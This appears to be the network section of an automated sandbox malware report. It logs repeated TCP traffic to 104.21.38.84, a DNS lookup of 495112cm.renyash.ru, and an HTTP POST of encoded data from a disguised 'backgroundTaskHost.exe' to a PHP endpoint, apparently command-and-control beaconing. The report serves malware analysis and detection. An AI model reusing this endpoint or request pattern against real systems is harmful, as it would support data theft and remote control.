                                                                                          Jan 4, 2025 11:09:27.077933073 CET5014580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.078527927 CET5014680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.082829952 CET8050144104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.082874060 CET5014480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.083137035 CET8050145104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.083178043 CET5014580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.083308935 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.083363056 CET5014680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.083452940 CET5014680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.088185072 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.436322927 CET5014680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.441231966 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.441243887 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.441255093 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.537556887 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.686338902 CET5014680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.712111950 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.839535952 CET5014680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.843570948 CET5014780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.844588995 CET8050146104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.848360062 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:27.848390102 CET5014680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.851675987 CET5014780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.851675987 CET5014780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:27.856518984 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.201920033 CET5014780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:28.206875086 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.206886053 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.206896067 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.304510117 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.374732018 CET5014780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:28.561491966 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.685340881 CET5014780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:28.685885906 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:28.690438986 CET8050147104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.690548897 CET5014780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:28.690753937 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:28.690865993 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:28.690932035 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:28.695663929 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.045684099 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.050510883 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.050525904 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.050535917 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.135080099 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.280005932 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.360640049 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.418735027 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.482685089 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.483335972 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.487679958 CET8050148104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.487720013 CET5014880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.488135099 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.488188028 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.488266945 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.493084908 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.842552900 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:29.847528934 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.847539902 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.847548962 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:29.938638926 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.076893091 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.199486017 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.264388084 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.323183060 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.323724031 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.328265905 CET8050149104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.328510046 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.328598976 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.328599930 CET5014980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.328701019 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.333481073 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.687578917 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.692464113 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.692475080 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.692485094 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.793955088 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:30.873769045 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:30.971450090 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.076884031 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.092895985 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.093517065 CET5015180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.097924948 CET8050150104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.097966909 CET5015080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.098392963 CET8050151104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.098443985 CET5015180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.098578930 CET5015180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.103323936 CET8050151104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.451946020 CET5015180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.456864119 CET8050151104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.456876040 CET8050151104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.456886053 CET8050151104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.575655937 CET8050151104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.631325960 CET5015180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.843467951 CET5015280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.843472004 CET5015180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.847848892 CET8050151104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.848329067 CET8050152104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.848409891 CET5015280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.848412037 CET5015180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.848490953 CET5015280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.848515034 CET8050151104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.848608017 CET5015180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.853310108 CET8050152104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.963963985 CET5015380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.968770027 CET8050153104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:31.968836069 CET5015380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.968924046 CET5015380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:31.973767042 CET8050153104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:32.202939987 CET5015280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:32.207796097 CET8050152104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:32.207958937 CET8050152104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:32.293550968 CET8050152104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:32.326945066 CET5015380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:32.331835985 CET8050153104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:32.331845999 CET8050153104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:32.331855059 CET8050153104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:32.375629902 CET5015280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:32.412290096 CET8050153104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:32.483136892 CET5015380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:32.589107037 CET8050153104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:32.610491991 CET8050152104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:32.686543941 CET5015380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:32.713365078 CET5015280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:32.713368893 CET5015380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:32.713970900 CET5015480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:32.718401909 CET8050153104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:32.718750000 CET8050152104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:32.718760967 CET8050154104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:32.718827009 CET5015280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:32.718827963 CET5015380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:32.718936920 CET5015480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:32.719013929 CET5015480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:32.723776102 CET8050154104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:33.076935053 CET5015480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:33.081928015 CET8050154104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:33.081938982 CET8050154104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:33.081947088 CET8050154104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:33.183233976 CET8050154104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:33.321969986 CET5015480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:33.361776114 CET8050154104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:33.466372013 CET5015480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:33.483268023 CET5015580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:33.488136053 CET8050155104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:33.488195896 CET5015580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:33.488331079 CET5015580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:33.493083954 CET8050155104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:33.842590094 CET5015580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:33.847542048 CET8050155104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:33.847559929 CET8050155104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:33.847573996 CET8050155104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:33.947079897 CET8050155104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:34.079582930 CET5015580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:34.213927984 CET8050155104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:34.266318083 CET5015580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:34.339421988 CET5015580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:34.339422941 CET5015680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:34.344260931 CET8050156104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:34.344476938 CET8050155104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:34.344477892 CET5015680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:34.344525099 CET5015580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:34.344669104 CET5015680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:34.349415064 CET8050156104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:34.703591108 CET5015680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:34.708447933 CET8050156104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:34.708463907 CET8050156104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:34.708472967 CET8050156104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:34.809156895 CET8050156104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:34.939121008 CET5015680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:34.989233971 CET8050156104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:35.057430029 CET5015680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.116179943 CET5015680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.116769075 CET5015780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.121097088 CET8050156104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:35.121145010 CET5015680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.121537924 CET8050157104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:35.121588945 CET5015780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.121694088 CET5015780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.126447916 CET8050157104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:35.467626095 CET5015780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.472513914 CET8050157104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:35.472526073 CET8050157104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:35.472585917 CET8050157104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:35.565550089 CET8050157104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:35.764411926 CET5015780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.824965000 CET8050157104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:35.873775959 CET5015780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.947601080 CET5015480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.947602987 CET5012380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.952238083 CET5015780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.955598116 CET5015880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.957573891 CET8050157104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:35.961021900 CET8050158104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:35.961051941 CET5015780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.963733912 CET5015880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.963733912 CET5015880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:35.969350100 CET8050158104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:36.311619043 CET5015880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:36.316539049 CET8050158104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:36.316550016 CET8050158104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:36.316562891 CET8050158104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:36.417108059 CET8050158104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:36.576925993 CET5015880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:36.679635048 CET8050158104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:36.679975986 CET5015880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:36.684416056 CET8050158104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:36.767594099 CET5015880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:36.807317972 CET5015980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:36.807323933 CET5015880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:36.812145948 CET8050159104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:36.812386990 CET8050158104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:36.815649986 CET5015880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:36.815661907 CET5015980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:36.815766096 CET5015980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:36.820544004 CET8050159104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:37.170706034 CET5015980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:37.175617933 CET8050159104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:37.175628901 CET8050159104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:37.175637007 CET8050159104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:37.345726967 CET8050159104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:37.483165026 CET5015980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:37.515870094 CET8050159104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:37.617177963 CET5015980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:37.625837088 CET5015980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:37.626161098 CET5016080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:37.630918026 CET8050159104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:37.630933046 CET8050160104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:37.630991936 CET5016080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:37.630995989 CET5015980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:37.642529011 CET5016180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:37.647367001 CET8050161104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:37.647429943 CET5016180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:37.647496939 CET5016180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:37.652262926 CET8050161104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:37.998862982 CET5016180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:38.004158020 CET8050161104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:38.004175901 CET8050161104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:38.004184008 CET8050161104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:38.090574980 CET8050161104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:38.267647028 CET5016180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:38.398099899 CET8050161104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:38.510751963 CET5016180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:38.510755062 CET5016280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:38.515626907 CET8050162104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:38.515738010 CET5016280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:38.515846968 CET5016280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:38.515877008 CET8050161104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:38.516026020 CET5016180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:38.520672083 CET8050162104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:38.874038935 CET5016280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:38.879009008 CET8050162104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:38.879122019 CET8050162104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:38.879131079 CET8050162104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:38.958682060 CET8050162104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:39.061314106 CET5016280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:09:39.266107082 CET8050162104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:09:39.376146078 CET5016280192.168.2.4104.21.38.84

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 4, 2025 11:07:36.050529003 CET5636353192.168.2.41.1.1.1
                                                                                          Jan 4, 2025 11:07:36.439692974 CET53563631.1.1.1192.168.2.4

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Jan 4, 2025 11:07:36.050529003 CET192.168.2.41.1.1.10x687dStandard query (0)495112cm.renyash.ruA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Jan 4, 2025 11:07:36.439692974 CET1.1.1.1192.168.2.40x687dNo error (0)495112cm.renyash.ru104.21.38.84A (IP address)IN (0x0001)false
                                                                                          Jan 4, 2025 11:07:36.439692974 CET1.1.1.1192.168.2.40x687dNo error (0)495112cm.renyash.ru172.67.220.198A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • 495112cm.renyash.ru

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.449736104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:07:36.452708960 CET316OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 344
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:07:36.811253071 CET344OUTData Raw: 00 07 04 07 06 0e 01 07 05 06 02 01 02 06 01 02 00 0b 05 0c 02 0c 03 08 00 54 0d 51 04 02 02 00 0f 05 04 0d 00 53 06 01 0c 05 02 01 06 00 07 54 04 06 0d 0d 0e 00 07 03 01 05 03 01 06 55 00 0e 01 06 0d 01 05 51 07 09 0e 0f 0f 07 0f 07 0c 06 07 50
                                                                                          Data Ascii: TQSTUQPVTV\L}Pkcb@t\ua[|~oj]`Uh`tDllsx^[Z}mwRttk\~O~V@BxmPrq
                                                                                          Jan 4, 2025 11:07:36.896028996 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:07:37.160557985 CET1236INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:07:37 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HtZMsZJsfUfUE%2B3X1cISOUvQ%2FvIpqTdFsySIF%2F%2F8IPnHfoezPO011Cyo4S8clQqQVL7c%2FSOlsZ2%2Bqdpjj7GH88DNLhlvYH2SrFO%2FIc1SNNZJwhC1Uk47A1998hTHl0mW9NSJUhiG"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6c2f5aae6a5f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2515&min_rtt=1622&rtt_var=2394&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=660&delivery_rate=166514&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 35 34 34 0d 0a 56 4a 7e 05 6c 43 73 49 7b 62 5a 49 7c 4f 74 59 6a 5e 78 51 7c 06 79 0d 7a 5a 73 5d 7d 61 67 5b 77 73 75 09 6d 4f 66 59 61 00 7c 00 7d 71 78 01 55 4b 72 52 77 62 5e 5e 7c 5b 69 00 7d 77 5f 55 7b 76 5e 40 6a 4d 7b 04 75 72 75 02 77 58 71 01 7f 5f 76 03 7e 6c 73 54 7d 77 68 5b 75 4c 7b 06 7c 5c 79 01 69 5e 6d 02 7b 77 7b 5d 79 67 6c 4f 79 6d 7b 4b 7a 5c 78 00 6c 4d 66 03 68 70 6b 5b 7b 67 74 03 6a 4c 7c 5f 76 71 5e 03 7a 51 41 5b 7f 5e 74 09 7c 71 53 41 76 0a 68 4c 7b 7c 64 49 76 63 7e 43 6e 58 7e 5c 69 7f 65 5e 7a 61 72 01 61 05 6c 59 77 62 60 41 77 58 7e 50 7e 5d 7a 06 60 62 6d 05 61 66 70 09 6b 7c 66 5c 60 6f 70 04 7f 05 7c 03 78 6f 7b 03 7b 06 76 03 7c 6e 70 08 60 59 6c 04 7e 62 5b 50 7e 7d 77 0d 78 7e 72 03 6a 72 79 40 7b 5d 46 51 7d 7c 74 0d 6a 70 63 50 7d 77 79 58 7b 7e 67 4b 7b 72 68 49 6b 5f 5e 5e 69 59 64 51 7f 60 72 51 7b 63 63 5e 7d 5b 6c 05 63 5d 79 51 7b 5c 79 03 76 66 68 4b 7e 66 74 04 7d 58 53 09 74 72 51 49 7c 62 5b 06 7d 77 76 43 7b 48 78 40 7e 5d 6b 05 75 62 7d 04 74 [TRUNCATED]
                                                                                          Data Ascii: 544VJ~lCsI{bZI|OtYj^xQ|yzZs]}ag[wsumOfYa|}qxUKrRwb^^|[i}w_U{v^@jM{uruwXq_v~lsT}wh[uL{|\yi^m{w{]yglOym{Kz\xlMfhpk[{gtjL|_vq^zQA[^t|qSAvhL{|dIvc~CnX~\ie^zaralYwb`AwX~P~]z`bmafpk|f\`op|xo{{v|np`Yl~b[P~}wx~rjry@{]FQ}|tjpcP}wyX{~gK{rhIk_^^iYdQ`rQ{cc^}[lc]yQ{\yvfhK~ft}XStrQI|b[}wvC{Hx@~]kub}tayJOrF~ldN~YYKv_{x\[H~^iIygRMywpxSkyL|xMPNx{YlJ}r]u_t~R{|g||q_NvR^xRdKt^Tz_a}|vzqvv
